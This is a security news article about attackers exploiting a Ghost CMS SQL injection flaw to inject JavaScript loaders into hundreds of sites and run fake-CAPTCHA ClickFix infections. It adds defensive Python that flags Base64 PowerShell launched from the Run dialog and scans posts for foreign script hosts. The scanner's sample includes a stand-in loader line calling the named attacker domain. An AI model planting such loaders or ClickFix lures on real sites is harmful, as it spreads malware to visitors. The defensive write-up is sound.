Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks

Hackers are actively exploiting a high-severity vulnerability in Ghost CMS to inject malicious scripts and run widespread ClickFix browser-based attacks across compromised websites.

Cybersecurity researchers have confirmed that threat actors are leveraging a critical SQL injection vulnerability in the Ghost CMS platform—tracked as CVE-2026-26980—to compromise more than 700 websites worldwide. The campaign has been linked to multiple threat groups and has been active since early May 2026.

The flaw, which carries a CVSS score of 9.4, was patched in February 2026 in Ghost CMS version 6.19.1 after being discovered through research involving AI-assisted security analysis.

How CVE-2026-26980 Enables Full Site Compromise

The vulnerability exists in Ghost CMS’s Content API and allows unauthenticated attackers to perform SQL injection attacks that can expose sensitive database information.

Security researchers at QiAnXin XLab report that attackers are abusing this weakness to extract administrative API keys from targeted websites. Once obtained, these credentials allow full control over site content through the Ghost Admin API.

With this level of access, attackers can directly modify published articles and inject malicious JavaScript code into legitimate web pages without detection.

Malicious JavaScript Used to Deliver ClickFix Attacks

Once a site is compromised, attackers inject JavaScript loaders into article pages. These scripts are designed as a two-stage payload delivery system that fetches additional malicious components from external servers at runtime.

The injected code connects to remote infrastructure such as clo4shara[.]xyz to retrieve dynamic payloads. Researchers note that this setup allows attackers to continuously change delivery mechanisms while keeping compromised websites functioning normally.

The external server also acts as a traffic distribution system, collecting browser fingerprinting data and determining how victims should be redirected or manipulated.

Advanced Evasion Through Traffic Cloaking Services

To avoid detection, attackers are using commercial cloaking services, including Adspect, to filter traffic and evade security scanners.

This technique ensures that security researchers, bots, and crawlers are shown harmless content, while real users are directed toward malicious payloads.

The system supports multiple command-based behaviors, including:

  • Redirecting victims to malicious pages
  • Displaying fake verification prompts
  • Triggering downloads or pop-ups
  • Executing custom JavaScript payloads

Fake CAPTCHA Leads to ClickFix Infection Chain

Victims who pass the cloaking filters are shown fake CAPTCHA pages designed to appear legitimate. These pages are used to initiate a ClickFix-style social engineering attack.

Users are instructed to copy a Base64-encoded command into the Windows Run dialog, unknowingly triggering a multi-stage infection process.

Once executed, the command downloads a ZIP archive containing malicious scripts. These scripts deploy PowerShell commands that fetch additional payloads, including DLL files or JavaScript-based loaders, depending on the attack variant.

In some cases, attackers use legitimate, code-signed binaries such as PuTTY to disguise malicious activity and reduce suspicion.
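The Run-dialog step is where endpoint telemetry can catch this chain: whatever is pasted into Run is started by explorer.exe, and a Base64 argument on an interpreter launched that way is unusual for real users. The detection check below is an added example, not from the article; it assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine), treats explorer.exe as the Run dialog's parent process, and uses constructed events.

```python
# Added example (not from the article): check process-creation events shaped like Sysmon
# Event ID 1 (Image, ParentImage, CommandLine) for an interpreter launched from the Windows
# Run dialog (parent explorer.exe) with a Base64 argument, and decode it for the analyst.
# SAMPLE_EVENTS are constructed.
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def decode_powershell_b64(blob):
    """-EncodedCommand carries UTF-16LE text; fall back to UTF-8 for other tools."""
    raw = base64.b64decode(blob)
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")

def detect_run_dialog_clickfix(events):
    """Return one finding per interpreter spawned by explorer.exe with an encoded argument."""
    findings = []
    for ev in events:
        if basename(ev.get("ParentImage", "")) != "explorer.exe":
            continue
        if basename(ev.get("Image", "")) not in INTERPRETERS:
            continue
        m = ENC_FLAG_RE.search(ev.get("CommandLine", ""))
        if m:
            findings.append({"image": basename(ev["Image"]),
                             "decoded": decode_powershell_b64(m.group(1))})
    return findings

# Constructed sample: a harmless stand-in command, encoded the way PowerShell expects.
SAMPLE_CMD = "Write-Output 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -w hidden -enc {SAMPLE_B64}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Build\agent.exe",  # scheduled build, not Run dialog
     "CommandLine": f"powershell -enc {SAMPLE_B64}"},
]
```

The decoded text is what an analyst needs to triage the alert; the second event shows why the parent check matters, since encoded PowerShell from automation is routine.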

Persistent Malware and Remote Control Capabilities

Later-stage payloads install persistent malware on infected systems, including modified desktop clients based on open-source applications. These malicious tools regularly communicate with attacker-controlled servers, enabling remote execution of commands every few seconds.

Capabilities include:

  • Running arbitrary JavaScript or executable files
  • Maintaining long-term persistence on infected systems
  • Receiving remote instructions from command-and-control servers
  • Executing additional payloads on demand

Widespread Impact Across High-Value Sectors

The campaign has affected a wide range of industries, including:

  • Universities and academic institutions
  • Blockchain and cryptocurrency platforms
  • AI and software-as-a-service (SaaS) providers
  • Media organizations
  • Financial technology companies
  • Cybersecurity research sites

Security analysts warn that the use of legitimate, trusted websites significantly increases the success rate of these ClickFix attacks.

Mitigation and Security Recommendations

Ghost CMS administrators are strongly advised to take immediate action to reduce the risk of compromise. Recommended steps include:

  • Upgrade to Ghost CMS version 6.19.1 or later
  • Rotate all administrative credentials and API keys
  • Audit server and access logs for suspicious activity
  • Remove any unauthorized scripts or injected content
  • Notify users who may have visited compromised pages
  • Monitor for unusual outbound traffic from CMS infrastructure
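The injected loaders described earlier live in ordinary article HTML, so the audit and clean-up steps above come down to finding script tags that reach hosts the site does not own. The scanner below is an added example, not code from the article or from the Ghost project: it takes each post's HTML (for instance from a Ghost content export) and a site-owned host allowlist, and the sample post is constructed.

```python
# Added example (not from the article or Ghost): flag <script> tags in Ghost post HTML
# that load from, or reference, hosts outside a site-owned allowlist. SAMPLE_POST is constructed.
import re
from html.parser import HTMLParser

URL_RE = re.compile(r"https?://([^/:?#\"'\s]+)", re.IGNORECASE)

def canonical_host(host):  # defanged example[.]xyz compares equal to the live host
    return host.lower().replace("[.]", ".")

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src.strip())
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)

def find_suspicious_scripts(post_html, allowed_hosts):
    """Return (reason, host) findings for scripts reaching hosts not on the allowlist."""
    allowed = {canonical_host(h) for h in allowed_hosts}
    parser = ScriptCollector()
    parser.feed(post_html)
    findings = []
    for src in parser.srcs:  # protocol-relative //host/x counts as https; relative paths are skipped
        m = URL_RE.search("https:" + src if src.startswith("//") else src)
        if m and canonical_host(m.group(1)) not in allowed:
            findings.append(("external-script-src", canonical_host(m.group(1))))
    for body in parser.inline:  # runtime loaders that build their second stage
        for host in sorted({canonical_host(h) for h in URL_RE.findall(body)} - allowed):
            findings.append(("inline-script-references", host))
    return findings

SAMPLE_POST = """<p>Welcome to the blog.</p>
<script src="https://example-blog.org/assets/theme.js"></script>
<script>
  // constructed stand-in for an injected loader
  var s = document.createElement('script'); s.src = 'https://clo4shara[.]xyz/' + Date.now();
</script>"""
```

Run it over every post after rotating the Admin API keys, since a compromised key lets the attacker re-inject content as soon as it is removed.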

Conclusion

The exploitation of CVE-2026-26980 highlights how quickly CMS vulnerabilities can be weaponized at scale. By combining SQL injection, credential theft, and browser-based social engineering, attackers have successfully turned hundreds of legitimate websites into malware distribution platforms.

Security experts emphasize that timely patching and continuous monitoring remain critical defenses against fast-moving exploitation campaigns targeting popular web platforms like Ghost CMS.
